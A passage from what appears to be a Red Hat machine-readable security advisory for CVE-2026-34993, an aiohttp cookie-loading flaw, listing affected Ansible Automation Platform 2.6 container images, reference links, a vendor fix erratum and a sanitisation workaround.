"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:3ce796ad0c27b82cd6ba0cd946da69e2d62ad392f60dff571a6e826ab17dd8bc_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:5c06c479d96b8340382301cb60505f05afcb064d3daf3951df9d8a108b1e4a97_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:c0a8ca9591bb9385e2a8773aedbb40f84f4f4f229b0ec1b9bf16c4cedef2f6ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:a48db0666b33ef1be5ab4ff02d7584c3fa1516c8a18f09295ae6a220d2e2ebf6_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:b475aea1e95b14a065f76a83e5c8aa74f274955297762808f059ed857cd9cb92_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:bf591d6bc29f3c394b29fd34b0a458cee5c3368130f1aa1e226e49fd112c44fc_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-supported-rhel9@sha256:e7369d9a7242b115b78f7ff72c1a59912fb8304e93220a6faeaf44c25c6b5a71_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:2a12a79a557dd5e32b77eb977c3698ae2191f015121d38689369ae39f22a5f11_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:3b61f49f0dd276d22d67f3e97fb9ffa3382b4a086416f6e59b20ec3e492871cd_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:53432365b9bb22c5df6da741687df208111fcabdea834a3fe9159b0ecf4b73df_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9-operator@sha256:9e0ca740576e5ddc2af43456f7a8b1dc74e37a4f0734236848b8fae58a0a2e8b_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:38f097e4920d4e64c8b8839fcc353f4ff32e607719b5e36f23e208bc70d75b59_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:464caa10ae549dff7824e330f9d5e7e10aacf7b9ee056a6b4aa2768953c94fd8_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:9c7fea42d26e687c017aa573fa13b01ee738c88fe11e55317430e4e8b66d339c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-rhel9@sha256:d0a2f84070918986561679893a78e6da279f7680fb7c00bddcc518974ba1e39c_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:361532ae39672ed922d1e23a09c99cc6f3e596e482c0180d9858346b584c9449_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:8a8db7f1d38de954a4d61f8a98cd91edfe182fcf78750fdaaeb3cf3654897a97_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:96403661397e470423486a3016ea895dc68885d9ba7f855921cda3825d974eb3_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/eda-controller-ui-rhel9@sha256:bf9c237fdc696c54f4263caac1c8784fd77a4a2d55dd59f31dc5008a809cf276_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:03b16022be5e25db2bf45e01526c42b782baba00c0b94175d5598fe65574460e_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:6051f354edc4b2e1143062dd5912d55e90f5db762fca6d7fa8df03bc29b06b0d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:87db0da260805165f54ef956c9e4b1e6a4f6e559306a35558696fb2861422cef_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-minimal-rhel9@sha256:e7c8da3d2b7b9c2cfd4240a232b5a388e6ca09927b77b83ca95c66d0270846b0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:63ccd8ad711852fb955c10b1ee57fd3895e50220ce5f1877e58130a7ff8128a6_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:6734e6c33e10a5511392126f447a92c57bfd2ef5f3c3650230a5910e3e20fcf1_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7576c16f17a67d327a1b275b34c1612ae3811c849ef163eb44a6c6013659382e_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ee-supported-rhel9@sha256:7dfd8a045a5df672dc2b4f76bff307c0a78c1703e0572f10c1e07bd46e735947_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:08b6f737eed5ee48478db9bfaceb6e9339e2824ecc1973728c697ceae48a488f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:54621aa4ed969de8ec7e3d137178e35ba0fc61c43795e1bd0282c7219bb1d5b0_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:a9c0c6bcdcb061b85074a7e681c6152e7dc64b85571f2cc17001e18f26276ba8_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-proxy-rhel9@sha256:da378637b565a2793993a1da503bf13f0c1f135e8cc5c6e569f9ee7c8617023c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:2f9958a2ab37aa25749d5cb9eb9d0dc8bf6b79846963c04f95d09bcc061431e9_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:63abb6f786ed50165351ec2f03649ef0ff5d05e06a939e2314c8b8b4729e803a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:ad9dd51cd467fa3da27d65919644e364baf3c62a7942c9261ea17b72875d7071_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9-operator@sha256:f5cce04af00f9b56926d067e21e7e252b8d86226f1173f9840ff94d9e8e99d8b_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:3bb5c591fa83d61af4a21f63ab1e044aa56f86a89cbda17b77b98a2a3bb088b9_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:6f03123e4543be01c7f3b592d55db7793a95d1983a1fe8c3ff2ad1c043cc54a4_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:b579af422da0bb4bc6fe17e598ca356e68957b566d9a607ff854ad6039572a56_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/gateway-rhel9@sha256:eb6a63704d33b1dcb9eefea57763389c0eeb94c6206e63711c95ac3f0163753c_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5148ead7df13311bd0b39fe2f02f4dc6f11d062598944c9b451a6c8e8b0c45f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:5f8cfecd3442742b867aeba03ea24009fbd89b31cec0dc02eb02c4d9098dfcec_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:a595b43d0efdd820048fbb9e7a8cefad5d2d20ae0d271fb16b34dd744b95e9eb_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9-operator@sha256:c1c608e5ee45a6d6248d7657e9b7f17cdb3f8342af9b5e94145217c6fb6efc2a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:0c3c53caa8ccbea82dfc5dfe795e2e77fc84fd2a485cf0888a095ebe13305363_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:50cee84ad72794144820f6b6d08583387ab4e5f0a6d81ea495430290b173b1ea_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:660235348fa58da3e9a78c757e0cfc5b7f03c5760b9086d2876d87a20888f6a2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-web-rhel9@sha256:ab5fb18f89334216119c70498585d74c689cdbf8fd21b5826b782d0b5427051f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:45057e5ae8e5a7bb6646bd7896707859539039e409ac334e8cb3eb99c554e031_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:5565418214a3480ba6e3a85f56838678549e515e374535813dfdc03700950cb7_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:9e97f4cb07e63cc820b988ff3bf7079a087f596341399339f9a94d056ac69301_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9-operator@sha256:fe1c1dc037cf3e7e690092c761452de7111a899c73512ae9132479f7262139f4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:389567d267aab51c7fce52a23439c821995099cec9e37f5962a5dc2114597f84_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:417900ad18144b608fd23c8106aa8824048176eaf5f41eff1af47c43c75b7a89_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:d4c4bb796641f32563ce478b6fc912d1d809b83220a8843cd440ffadb788d17f_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/mcp-tools-rhel9@sha256:e607ceaa2e3e14859f1ad60b394a1a896c5505662fa17b10f5afd532bda8be9f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:24d7574341fa646e12ca5180a655271b9d947907af80da860b2dab0b51442d12_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:405eeb4b9ece480096d6b4246999ed043c5c2af47006b50677a5f83df870fbe9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:653fd44dc56da7c4405e458fdcafdc358e323b1d917b97483cf37068da484088_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-rhel9-operator@sha256:77acabaa8cabde7fca8b90fffd651da92eacd54da6eb76933c749656535ef55c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9683a91e7d16893fe030e1701a2500d1e79c7bea0ab7557438b53d281acd14e4_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:9c3bee41f02ed223da8fd3e7a5fc73a67ef82837b947f785a85c6de742c2c75a_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a15644ebe6166a891d02fd672fa1c83242713096d3754a2fd20aa0627ccf45bf_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/platform-resource-runner-rhel9@sha256:a217de550b6a6509eca369318e2bd9585a70c67756ac9980f933b548de668f8d_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:184a16150bdf285e1a32a0901871b8fcee6be9529e95de219fd4702d27eeadf0_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:461fc04f1bc051c5ce6ced0e7d7179e9078dd5545eced38bdc37df7a9c06e722_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:64a02cef795fdf08d8b1d5c8bcc96c21c0196360ee3976a4afe5bdae98d3bf77_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/receptor-rhel9@sha256:ba3d764e2fcd2d4a8e145a1559bcf9c6daa006c1844ec0f22fecddd18fb39deb_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:33d841d14081ec5f0289e79b6644acb4b5a038f59191493d763d7db4328aeb94_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:7a40a0df543d520528dc35c3fe1c224b298bf24858f29bbedd879f1b23396f55_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:b13680f6f1c058afdca28132b54195532c8cbc0ac634d16591c1a98088933768_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/ansible-devspaces-rhel9@sha256:e037940ea94d2cf16586ec35000a890066860865e992949a28b0a52e18b8b3fa_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:118ad39a5e775943911f5ec803eea0051dc1c720a4b3d3402394e68fa5ca7ca7_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:18f55feaae83ee6506b3af76cdd511687e82995440f87af6e9b9aefa06e726ad_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:644bdbea9feb95628cb142c21d52a2357261a9fd2386ffae978971dd68cad3ec_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/mcp-server-rhel9@sha256:db407b56e08976d1a1014d6248ef3719e3b15dc2171d5281b21a865252c8016a_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:0e36aa1324c5cb24a1217dfb477731e386311c29880dc76453756aca4776080a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:16a9f451252541eb555f27528fc547724345767b364d913323077743b84b1b7b_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:787d0e6df45128836d907732ca546d054f10f2fd8708ec6fdbdb2418f9445066_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9-operator@sha256:d7869fb6e7fce7a1a26841475449f9c7c0b9c29445f5c9c5bd226abfa4ba7f26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:033fec39621ff64fd83905a4d656ecce7907f7c5531855253a682f414702561d_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:5eaeaaf91e9d13054c54d3060ba8380b42b72d1087612f65baca29c036d593a9_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:9bb6427006e96866392ac8804990b85f9ae7b5f4f1575e7d6123a3ab8d4b365e_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-tech-preview/metrics-service-rhel9@sha256:a6ecee20b39158df405c56ed811a882c2ea82a996308b51fad6ac659c669c566_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:62c5e15e425dd562e0a8199e437cdbd2f29e239bd758c25c893ef0a60e767128_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform/platform-operator-bundle@sha256:f72a736351733cb24b8243647309abcdf086f0cb8fe59e12a3e95510917dfb4d_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-34993"
},
{
"category": "external",
"summary": "RHBZ#2484099",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484099"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-34993",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-34993"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34993"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00",
"url": "https://github.com/aio-libs/aiohttp/commit/dcf40f30637e8752c76781cf6703b5a236749a00"
},
{
"category": "external",
"summary": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8",
"url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-jg22-mg44-37j8"
}
],
"release_date": "2026-06-02T18:29:15.847000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T21:39:16+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\nFor details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/red_hat_ansible_automation_platform/2.6#Upgrade",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:71a2f5713323a2d2140d476cb48b66dedeb6f89faf88192dfe40da6c294e2089_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:a85326093ec7a9ccde87ea243ad83934707fcef4871fccd934efcba50f355b94_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:af2444728b4c244f8e1b56a0f9d9c9325a1887987f25418833df09947f4ed7e5_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/hub-rhel9@sha256:e1daf0343f7b3e10b7843f85d64bd0ce35612e333597b7c5b48f033b7ec21c89_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:1a440c21e1d882875a73201b3135957387f0d7846678b22b52732e984931099a_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:50f2bcf49966112665eb82a30e199af6041624e5cdb2372a85075405acf63ab8_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:a4927ab07375561c595afb1898ea52e28a9efb6910bee1011332d23344052e3f_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-chatbot-rhel9@sha256:f69d4d8b4e9ad3666d4fa1aced7a01136f738b49f9c818ee71f7fbd44ff111ec_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:544021b673fcef3bfe5291e0e82ed387d93735b52c983cd7b8b15779f4676ac1_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d0230cc8ceaa4a82381b566d3661a49567f62c47ec8da11e8c96550e30bcb88f_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:d1246fb6fa7ff8221d88c00d73fa59ccfdc09eb3260af45adc8ddf568c5a0398_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/lightspeed-rhel9@sha256:f5c7dd391581c2549b57ea4a5f61133221d19951ac45ff10952bc26048b71975_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50479"
},
{
"category": "workaround",
"details": "Applications using AIOHTTP that are configured to load untrusted files via the `CookieJar.load()` function should implement input sanitization prior to loading. This prevents the injection of malicious code.",
"product_ids": [
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:1e388383c5111049bb8f2d1f37fcee6773067152d256492f7e9db908d52b4652_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:6458f36f24c26733e1a052ce8a1beac8efed6da6574133103d8dc7b868e580b2_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:b1561aa0c5cdc34467541dddd7be145859c3d3d041989d483eb54a720a65ec26_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/aap-must-gather-rhel9@sha256:dbaddb3974c4ca1a4f7e58b0a3d91ba7d2d946100cf55c6acd740a61ad2fb143_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:5049e7dd3ec73b82a0fdc7ba1f5c2ce7bfc4bfee023af24133d1c48eb2838d50_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:7c971a91ac52f6d5e8702548923890afb2aa586731c5092396d3e769516fb7ed_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:c4bc8ce6d217e861df5c0228812c612e9b1c200f3654b26e8bdfd36642b79c57_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-builder-rhel9@sha256:ec267e7bd945593d9bcd3be6201176e5b28376cdd5900d5da8c6f033b0420558_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:97b8905f103277144991667b7953a08fd7a7b2edc448a3d5b5195f1af6802014_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:d7fb722c1e4646d29ee32f5f9a74f7da3c87e07da52a7f28d58017931d375305_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e779c125e7fd9307e117fc7f4e4411f450871417f0447deb68c3821c26cae764_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/ansible-dev-tools-rhel9@sha256:e8113d25fd42fc3a31dc9bb120764c3b508995c23f73f7e99e0200ac411ad229_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:2a24b3e44cd208c8176d4739cf3fc7a19e9fff3b531ab7718de6f5a99db4e4d1_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:47fa330b3fe99501ba7d4b4bb5bc8b5ba0ea7880472070b27250b36fce3d035c_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:71a06d4925ea829abc69b3ab518f08844faeaf524bad4c1e6fbc658b8227e0ab_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9-operator@sha256:fa606a224ac6d3d5e17650a9b9a52e5cb76af57dc767adf79609e0ab95081304_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:08cca1f9a75b0352f17d517f6b7bab53ccf7fba7ef1ff5cedf777c5b68dd15fa_amd64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:381cb54bf157086017cfea6db2a32895b6109640520b4f35f4791b2295c0db29_arm64",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:8acf8e32e0dfca8b9a4cfcd765509424a8c1b884ad382a5f21d58e8c44e56cae_ppc64le",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/controller-rhel9@sha256:b46b200558db6b92db270ee3749b8d14b778208ab9ab59e2b7c00dc018d2f3ce_s390x",
"Red Hat Ansible Automation Platform 2.6:registry.redhat.io/ansible-automation-platform-26/de-minimal-rhel9@sha256:30745071ac71a3fdd97d062f180c8fd05d75d9955d4cfccbcf2aeec8deb7f084_s390x",
